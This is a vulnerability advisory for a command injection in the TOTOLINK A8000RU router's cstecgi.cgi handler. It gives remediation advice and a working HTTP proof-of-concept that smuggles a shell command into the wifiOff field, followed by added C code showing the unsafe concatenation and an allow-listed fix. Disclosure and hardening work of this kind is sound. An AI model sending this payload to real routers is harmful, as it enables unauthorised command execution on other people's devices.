# A8000RU Command Injection Vulnerability Summary

## Vulnerability Overview

The TOTOLINK A8000RU router has a command injection vulnerability. An attacker can craft a malicious request and exploit the `addEffect` parameter in `cstecgi.cgi` to control the value of `wifiOff`. This allows user input to be concatenated into the `uci set` command via the `Uci_Set_Str` function, which is ultimately executed through `exec`, enabling arbitrary system command execution.

## Impact Scope

- **Vendor**: TOTOLINK
- **Product**: A8000RU
- **Version**: 7.1cu.643_b20200521
- **Vulnerability Type**: Command Injection

## Remediation

- The vendor has not yet provided an official patch.
- Users are advised to temporarily disable the affected feature or restrict access to `cstecgi.cgi`.
- Upgrade to a fixed version if available.

## Proof-of-Concept (PoC)

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 92
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=21772465702.2
Connection: keep-alive

{"topiscurl":"setWIFIBasicCfg","addEffect":"1","wifiOff":"1 ls /setWIFIBasicCfg.txt"}
```

## Verification Result

After sending the above request, the router successfully created the file `setWIFIBasicCfg.txt`, whose content was the directory listing from the location of `/setWIFIBasicCfg.txt`, proving that the command injection was successful.
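
The root cause described in the overview is a request value concatenated into a command line that a shell then parses. As an added example (not code from this advisory or from the TOTOLINK firmware), the C code below contrasts that pattern with an allow-listed, shell-free call to `uci`; the function names and the UCI key `wireless.radio0.disabled` are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Unsafe pattern (assumed shape, not the firmware's code): the request value
 * is pasted into a command line that a shell later parses. Builds the string only. */
int build_cmd_unsafe(char *out, size_t n, const char *key, const char *val)
{
    return snprintf(out, n, "uci set %s=%s", key, val);
}

/* wifiOff is an on/off switch, so only "0" and "1" are acceptable. */
int wifi_off_is_valid(const char *val)
{
    return val != NULL && (strcmp(val, "0") == 0 || strcmp(val, "1") == 0);
}

/* Hardened form: allow-list the value, then run uci from an argv vector, so
 * no shell ever parses it. Returns -1 if rejected or failed, else exit status. */
int uci_set_wifi_off(const char *key, const char *val)
{
    char assign[128];
    int status, len;
    pid_t pid;
    if (!wifi_off_is_valid(val))
        return -1;
    len = snprintf(assign, sizeof assign, "%s=%s", key, val);
    if (len < 0 || (size_t)len >= sizeof assign || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "uci", "set", assign, NULL };
        execvp("uci", argv);
        _exit(127); /* uci binary not found */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *key = "wireless.radio0.disabled"; /* hypothetical UCI key */
    const char *bad = "1 ls /setWIFIBasicCfg.txt"; /* wifiOff value from the PoC */
    char cmd[256];
    build_cmd_unsafe(cmd, sizeof cmd, key, bad);
    printf("unsafe: %s\nhardened: %d\n", cmd, uci_set_wifi_off(key, bad));
    return 0;
}
```

The hardened function rejects the PoC value before any process is created; on a device, the same allow-list check belongs in the CGI handler before the value reaches `Uci_Set_Str`.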